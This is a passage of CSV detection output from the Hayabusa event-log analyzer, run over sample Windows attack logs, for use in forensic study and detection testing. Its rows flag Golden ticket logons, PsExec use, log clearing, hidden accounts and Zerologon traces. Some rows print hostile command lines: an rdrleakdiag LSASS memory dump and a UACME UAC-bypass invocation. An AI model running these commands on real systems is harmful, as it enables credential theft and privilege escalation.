Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP 
Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: JUMP01$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: not_existing_user : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: not_existing_user : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 
10.23.23.9 : Port: 50380 : LogonID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50317 : LogonID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - 
Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: 04246W-WIN10 : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60728 : LogonID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 : Path: 
C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,Logon Failure - Wrong Password,User: IEUser : Type: 2 : Workstation: MSEDGEWIN10 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-09 22:18:27.714 
+09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd8f6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd964 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,informational,Explicit Logon,Source User: svc01 : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\inetsrv\w3wp.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,System log file was cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx +2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation 02694W-WIN10 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49959 : LogonID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-24 01:49:41.578 
+09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50106 : LogonID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50107 : LogonID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\wermgr.exe -upload : Path: 
C:\Windows\System32\wermgr.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,"Command: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap : Path: C:\Windows\System32\rdrleakdiag.exe : User: DESKTOP-PIU87N6\wanwan : Parent Command: ""C:\WINDOWS\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,Command: C:\WINDOWS\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,Suspicious LSASS Process Clone,,rules/sigma/process_creation/win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: POC.exe : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 
03:35:02.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: Program : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: POC.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : 
